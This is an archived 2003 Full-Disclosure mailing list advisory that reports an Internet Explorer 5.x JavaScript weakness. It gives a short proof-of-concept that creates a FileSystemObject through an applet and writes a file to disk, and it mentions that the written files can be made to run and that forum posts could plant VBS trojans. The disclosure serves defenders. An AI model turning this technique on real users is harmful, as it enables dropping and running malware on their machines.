lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
From: freebrain at softhome.net (FREEBRAIN)
Subject: Internet Explorer JavaScript insecure function


* Internet Explorer JavaScript insecure function *


Product: Microsoft Internet Explorer
Version: 5.x (probabily other versions may be affected)


***


Problem:

I discovered a javascript function (interpreted by Internet Explorer) called "file.writeline()" may be 
potentially dangerous for Internet Explorer users. This function allows to write files  by means of 
JavaScript on a hard disk.

An attacker may use this function writting JavaScript code in posts of forums, guestbooks, etc  for owning 
his victim's computers. With "file.writeline()" function the attacker can write trojans/virus/etc on his 
victim's hard disks, for example, an attacker may use JavaScript "file.writeline()" function for writting 
a malicious file in VBS (Visual Basic Scripting) language. 

I repeat, this may be potentially dangerous for Internet Explorer users.

NOTE: Actually a virus in the wild that affects to mIRC users is using this function ("file.writeline").

NOTE2: As you can see on the "Proof of concept", other functions are needed to carry out an "intrusion".


***


Proof of concept:

InterfaceObject=document.applets[0];
setTimeout("Write()",1000);
function Write() {
fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
InterfaceObject.setCLSID(fsoClassID);
fso = InterfaceObject.createInstance();
// windir = fso.getspecialfolder ;        
filename = "\\proof.txt";
var filecontent = "Hello world";
file = fso.opentextfile(filename, "2", "TRUE");
file.writeline(filecontent)
file.close();

}

This code writes a file called "proof.txt" in the hard disk, with the content "Hello world". Also you can
execute files you write by means of JavaScript adding "Run();" to the function.


***


Solution:

I'm not sure about the solution but I recommend to upgrade to the last version of Internet Explorer.
Also I recommend webmasters to forbid HTML codes that content this function in their forums, guestbooks, etc.


***


Thanks to: 

#disidents,#hackers @ irc-phoenix.org

#disidents,#sleepx,#ayuda_internet @ irc-hispano.org

Special thanks go to: Impos

(sorry my poor english)


***


By FREEBRAIN

FREEBRAIN is a member of DisidentS Hacker Team

http://disidents-team.cjb.net (under construction) - http://www.gratisweb.com/disidents

<freebrain@...adoo.es>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031207/d9a9d53f/attachment.html

Powered by blists - more mailing lists